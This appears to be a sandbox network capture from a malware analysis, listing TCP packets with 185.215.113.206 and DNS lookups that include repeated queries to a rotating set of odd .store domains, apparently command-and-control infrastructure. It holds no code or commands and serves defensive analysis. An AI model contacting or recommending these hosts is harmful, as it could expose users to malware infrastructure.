Nov 10, 2024 04:55:25.697154999 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697165966 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697192907 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697200060 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697204113 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697217941 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697247028 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697247028 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697252035 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697268009 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697283030 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697293997 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697320938 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697335005 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697345972 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697374105 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697386980 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697395086 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697395086 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697397947 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697464943 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697475910 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697485924 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697503090 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697515011 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697525978 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697527885 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697535038 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697546959 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697555065 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697566032 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697576046 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697576046 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697598934 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697599888 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697629929 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697640896 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697704077 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697714090 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697722912 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697740078 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697757959 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697757959 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697870970 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697881937 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697890997 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697901011 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697911978 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697921991 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697932959 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697942019 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.697962046 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697962046 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.697962046 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.698106050 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.701800108 CET	443	49856	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:25.701819897 CET	443	49856	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:25.701863050 CET	443	49856	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:25.701890945 CET	49856	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:25.701946020 CET	49856	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:25.703080893 CET	49856	443	192.168.2.5	13.107.246.57
Nov 10, 2024 04:55:25.703088999 CET	443	49856	13.107.246.57	192.168.2.5
Nov 10, 2024 04:55:25.739814997 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.739825010 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.739830971 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.739836931 CET	80	49771	185.215.113.206	192.168.2.5
Nov 10, 2024 04:55:25.739960909 CET	49771	80	192.168.2.5	185.215.113.206
Nov 10, 2024 04:55:25.741839886 CET	49869	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:25.741858959 CET	443	49869	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:25.742136955 CET	49869	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:25.744576931 CET	49869	443	192.168.2.5	23.192.223.200
Nov 10, 2024 04:55:25.744585037 CET	443	49869	23.192.223.200	192.168.2.5
Nov 10, 2024 04:55:25.758516073 CET	443	49857	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:25.760194063 CET	49857	443	192.168.2.5	13.107.246.45
Nov 10, 2024 04:55:25.760215044 CET	443	49857	13.107.246.45	192.168.2.5
Nov 10, 2024 04:55:25.760941982 CET	49857	443	192.168.2.5	13.107.246.45

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 10, 2024 04:55:04.662292004 CET	192.168.2.5	1.1.1.1	0xd9d7	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:04.662810087 CET	192.168.2.5	1.1.1.1	0x6df4	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 10, 2024 04:55:09.736030102 CET	192.168.2.5	1.1.1.1	0xc7da	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:09.736171007 CET	192.168.2.5	1.1.1.1	0xc04b	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Nov 10, 2024 04:55:10.432365894 CET	192.168.2.5	1.1.1.1	0x2860	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:10.432485104 CET	192.168.2.5	1.1.1.1	0xd186	Standard query (0)	play.google.com	65	IN (0x0001)	false
Nov 10, 2024 04:55:15.809863091 CET	192.168.2.5	1.1.1.1	0x2e8e	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:15.810097933 CET	192.168.2.5	1.1.1.1	0xacb4	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false
Nov 10, 2024 04:55:17.061724901 CET	192.168.2.5	1.1.1.1	0x16b0	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:17.061908960 CET	192.168.2.5	1.1.1.1	0x9e5	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 10, 2024 04:55:18.639719963 CET	192.168.2.5	1.1.1.1	0xf179	Standard query (0)	clients2.googleusercontent.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:18.640157938 CET	192.168.2.5	1.1.1.1	0xff47	Standard query (0)	clients2.googleusercontent.com	65	IN (0x0001)	false
Nov 10, 2024 04:55:18.814887047 CET	192.168.2.5	1.1.1.1	0x76a6	Standard query (0)	sb.scorecardresearch.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:18.815036058 CET	192.168.2.5	1.1.1.1	0x203c	Standard query (0)	sb.scorecardresearch.com	65	IN (0x0001)	false
Nov 10, 2024 04:55:18.827985048 CET	192.168.2.5	1.1.1.1	0x1f81	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:18.828113079 CET	192.168.2.5	1.1.1.1	0x9247	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Nov 10, 2024 04:55:18.835532904 CET	192.168.2.5	1.1.1.1	0x855a	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:18.835799932 CET	192.168.2.5	1.1.1.1	0x2828	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Nov 10, 2024 04:55:18.863816023 CET	192.168.2.5	1.1.1.1	0xe6a4	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:18.863943100 CET	192.168.2.5	1.1.1.1	0x6187	Standard query (0)	api.msn.com	65	IN (0x0001)	false
Nov 10, 2024 04:55:19.789786100 CET	192.168.2.5	1.1.1.1	0xc4cd	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:19.790030956 CET	192.168.2.5	1.1.1.1	0xd99	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 10, 2024 04:55:19.790694952 CET	192.168.2.5	1.1.1.1	0xfcb6	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 10, 2024 04:55:19.790695906 CET	192.168.2.5	1.1.1.1	0xbbad	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:19.801165104 CET	192.168.2.5	1.1.1.1	0x8b08	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:19.801301956 CET	192.168.2.5	1.1.1.1	0x1be0	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 10, 2024 04:56:18.091187954 CET	192.168.2.5	1.1.1.1	0xf4e0	Standard query (0)	bzib.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:18.091422081 CET	192.168.2.5	1.1.1.1	0xd572	Standard query (0)	bzib.nelreports.net	65	IN (0x0001)	false
Nov 10, 2024 04:56:20.735481977 CET	192.168.2.5	1.1.1.1	0xc560	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:20.760505915 CET	192.168.2.5	1.1.1.1	0xc8d5	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:20.786746979 CET	192.168.2.5	1.1.1.1	0x8875	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:20.810026884 CET	192.168.2.5	1.1.1.1	0x5ba9	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:20.838299990 CET	192.168.2.5	1.1.1.1	0x6a8b	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:20.866455078 CET	192.168.2.5	1.1.1.1	0xaa60	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:20.893110991 CET	192.168.2.5	1.1.1.1	0xe7c8	Standard query (0)	navygenerayk.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:31.010350943 CET	192.168.2.5	1.1.1.1	0xe8f2	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:31.010770082 CET	192.168.2.5	1.1.1.1	0x5676	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 10, 2024 04:56:31.012691021 CET	192.168.2.5	1.1.1.1	0xbd5a	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:31.012834072 CET	192.168.2.5	1.1.1.1	0xa067	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 10, 2024 04:56:31.014136076 CET	192.168.2.5	1.1.1.1	0x466a	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:31.014271021 CET	192.168.2.5	1.1.1.1	0x9e6e	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 10, 2024 04:56:38.256803036 CET	192.168.2.5	1.1.1.1	0x8c35	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:38.285825968 CET	192.168.2.5	1.1.1.1	0x25fc	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:38.311765909 CET	192.168.2.5	1.1.1.1	0x9925	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:38.339782000 CET	192.168.2.5	1.1.1.1	0xf496	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:38.364399910 CET	192.168.2.5	1.1.1.1	0x1c54	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:38.387680054 CET	192.168.2.5	1.1.1.1	0x4703	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:53.198656082 CET	192.168.2.5	1.1.1.1	0xc170	Standard query (0)	browser.events.data.msn.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:53.198822021 CET	192.168.2.5	1.1.1.1	0xee3f	Standard query (0)	browser.events.data.msn.com	65	IN (0x0001)	false
Nov 10, 2024 04:56:56.018383980 CET	192.168.2.5	1.1.1.1	0xd2da	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:56.018651962 CET	192.168.2.5	1.1.1.1	0xe3ae	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Nov 10, 2024 04:56:56.164366961 CET	192.168.2.5	1.1.1.1	0x3966	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:56.164530039 CET	192.168.2.5	1.1.1.1	0xb235	Standard query (0)	www.google.com	65	IN (0x0001)	false
Nov 10, 2024 04:56:57.474129915 CET	192.168.2.5	1.1.1.1	0x3907	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:57.474294901 CET	192.168.2.5	1.1.1.1	0x39a8	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Nov 10, 2024 04:57:01.405858040 CET	192.168.2.5	1.1.1.1	0x5166	Standard query (0)	mdec.nelreports.net	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:01.406373978 CET	192.168.2.5	1.1.1.1	0x7cbd	Standard query (0)	mdec.nelreports.net	65	IN (0x0001)	false
Nov 10, 2024 04:57:05.281063080 CET	192.168.2.5	1.1.1.1	0x7248	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:05.306749105 CET	192.168.2.5	1.1.1.1	0x64ca	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:05.333512068 CET	192.168.2.5	1.1.1.1	0xb721	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:05.359174013 CET	192.168.2.5	1.1.1.1	0xa96d	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:05.382129908 CET	192.168.2.5	1.1.1.1	0x7bd1	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:05.407972097 CET	192.168.2.5	1.1.1.1	0x89d5	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:30.355006933 CET	192.168.2.5	1.1.1.1	0xc144	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:30.355149031 CET	192.168.2.5	1.1.1.1	0xfc27	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 10, 2024 04:57:30.357933044 CET	192.168.2.5	1.1.1.1	0xe9e7	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:30.358248949 CET	192.168.2.5	1.1.1.1	0x152a	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 10, 2024 04:57:30.358447075 CET	192.168.2.5	1.1.1.1	0x97de	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:30.358553886 CET	192.168.2.5	1.1.1.1	0xa7b8	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 10, 2024 04:57:34.573246956 CET	192.168.2.5	1.1.1.1	0xb1d3	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:57:57.446192026 CET	192.168.2.5	1.1.1.1	0x7ed5	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:58:10.090308905 CET	192.168.2.5	1.1.1.1	0xdbb2	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:58:27.197662115 CET	192.168.2.5	1.1.1.1	0xbce	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:59:14.024591923 CET	192.168.2.5	1.1.1.1	0xa5c0	Standard query (0)	founpiuer.store	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:59:40.552720070 CET	192.168.2.5	1.1.1.1	0x830d	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:59:40.552720070 CET	192.168.2.5	1.1.1.1	0x1c29	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 10, 2024 04:59:59.461966038 CET	192.168.2.5	1.1.1.1	0xd87d	Standard query (0)	chrome.cloudflare-dns.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:59:59.462122917 CET	192.168.2.5	1.1.1.1	0x5230	Standard query (0)	chrome.cloudflare-dns.com	65	IN (0x0001)	false
Nov 10, 2024 05:00:00.477768898 CET	192.168.2.5	1.1.1.1	0xfb03	Standard query (0)	ntp.msn.com	A (IP address)	IN (0x0001)	false
Nov 10, 2024 05:00:00.477768898 CET	192.168.2.5	1.1.1.1	0x1e00	Standard query (0)	ntp.msn.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 10, 2024 04:55:04.668968916 CET	1.1.1.1	192.168.2.5	0xd9d7	No error (0)	www.google.com		142.250.185.68	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:04.669260979 CET	1.1.1.1	192.168.2.5	0x6df4	No error (0)	www.google.com			65	IN (0x0001)	false
Nov 10, 2024 04:55:09.742912054 CET	1.1.1.1	192.168.2.5	0xc04b	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:09.742927074 CET	1.1.1.1	192.168.2.5	0xc7da	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:09.742927074 CET	1.1.1.1	192.168.2.5	0xc7da	No error (0)	plus.l.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:10.439362049 CET	1.1.1.1	192.168.2.5	0x2860	No error (0)	play.google.com		216.58.206.78	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:15.816646099 CET	1.1.1.1	192.168.2.5	0x2e8e	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:15.817058086 CET	1.1.1.1	192.168.2.5	0xacb4	No error (0)	ntp.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:16.050776958 CET	1.1.1.1	192.168.2.5	0x4255	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:16.085124016 CET	1.1.1.1	192.168.2.5	0x5e44	No error (0)	bingadsedgeextension-prod-europe.azurewebsites.net	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:16.085124016 CET	1.1.1.1	192.168.2.5	0x5e44	No error (0)	ssl.bingadsedgeextension-prod-europe.azurewebsites.net		94.245.104.56	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:17.068494081 CET	1.1.1.1	192.168.2.5	0x16b0	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:17.068820000 CET	1.1.1.1	192.168.2.5	0x9e5	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:18.646325111 CET	1.1.1.1	192.168.2.5	0xf179	No error (0)	clients2.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:18.646325111 CET	1.1.1.1	192.168.2.5	0xf179	No error (0)	googlehosted.l.googleusercontent.com		172.217.16.193	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:18.821746111 CET	1.1.1.1	192.168.2.5	0x76a6	No error (0)	sb.scorecardresearch.com		18.244.18.27	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:18.821746111 CET	1.1.1.1	192.168.2.5	0x76a6	No error (0)	sb.scorecardresearch.com		18.244.18.38	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:18.821746111 CET	1.1.1.1	192.168.2.5	0x76a6	No error (0)	sb.scorecardresearch.com		18.244.18.32	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:18.821746111 CET	1.1.1.1	192.168.2.5	0x76a6	No error (0)	sb.scorecardresearch.com		18.244.18.122	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:18.834580898 CET	1.1.1.1	192.168.2.5	0x1f81	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:18.835103989 CET	1.1.1.1	192.168.2.5	0x9247	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:18.842125893 CET	1.1.1.1	192.168.2.5	0x855a	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:18.842695951 CET	1.1.1.1	192.168.2.5	0x2828	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:18.870357037 CET	1.1.1.1	192.168.2.5	0xe6a4	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:18.870574951 CET	1.1.1.1	192.168.2.5	0x6187	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:19.796319962 CET	1.1.1.1	192.168.2.5	0xc4cd	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:19.796319962 CET	1.1.1.1	192.168.2.5	0xc4cd	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:19.796538115 CET	1.1.1.1	192.168.2.5	0xd99	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 10, 2024 04:55:19.797199965 CET	1.1.1.1	192.168.2.5	0xfcb6	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 10, 2024 04:55:19.797755003 CET	1.1.1.1	192.168.2.5	0xbbad	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:19.797755003 CET	1.1.1.1	192.168.2.5	0xbbad	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:19.807832956 CET	1.1.1.1	192.168.2.5	0x8b08	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:19.807832956 CET	1.1.1.1	192.168.2.5	0x8b08	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:19.807843924 CET	1.1.1.1	192.168.2.5	0x1be0	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 10, 2024 04:55:20.158066988 CET	1.1.1.1	192.168.2.5	0x5347	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:20.158066988 CET	1.1.1.1	192.168.2.5	0x5347	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:21.168354034 CET	1.1.1.1	192.168.2.5	0xe36f	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:55:21.168354034 CET	1.1.1.1	192.168.2.5	0xe36f	No error (0)	sni1gl.wpc.nucdn.net		152.199.21.175	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:55:21.168734074 CET	1.1.1.1	192.168.2.5	0x75ca	No error (0)	scdn1f005.wpc.ad629.nucdn.net	sni1gl.wpc.nucdn.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:18.097862005 CET	1.1.1.1	192.168.2.5	0xf4e0	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:18.098494053 CET	1.1.1.1	192.168.2.5	0xd572	No error (0)	bzib.nelreports.net	bzib.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 10, 2024 04:56:20.757603884 CET	1.1.1.1	192.168.2.5	0xc560	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:20.782701969 CET	1.1.1.1	192.168.2.5	0xc8d5	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:20.808571100 CET	1.1.1.1	192.168.2.5	0x8875	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:20.832401037 CET	1.1.1.1	192.168.2.5	0x5ba9	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:20.860310078 CET	1.1.1.1	192.168.2.5	0x6a8b	Name error (3)	necklacedmny.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:20.888046026 CET	1.1.1.1	192.168.2.5	0xaa60	Name error (3)	founpiuer.store	none	none	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:20.930923939 CET	1.1.1.1	192.168.2.5	0xe7c8	No error (0)	navygenerayk.store		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:20.930923939 CET	1.1.1.1	192.168.2.5	0xe7c8	No error (0)	navygenerayk.store		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:31.016962051 CET	1.1.1.1	192.168.2.5	0xe8f2	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:31.016962051 CET	1.1.1.1	192.168.2.5	0xe8f2	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:31.017160892 CET	1.1.1.1	192.168.2.5	0x5676	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 10, 2024 04:56:31.019217014 CET	1.1.1.1	192.168.2.5	0xa067	No error (0)	chrome.cloudflare-dns.com			65	IN (0x0001)	false
Nov 10, 2024 04:56:31.019552946 CET	1.1.1.1	192.168.2.5	0xbd5a	No error (0)	chrome.cloudflare-dns.com		172.64.41.3	A (IP address)	IN (0x0001)	false
Nov 10, 2024 04:56:31.019552946 CET	1.1.1.1	192.168.2.5	0xbd5a	No error (0)	chrome.cloudflare-dns.com		162.159.61.3	A (IP address)	IN (0x0001)	false
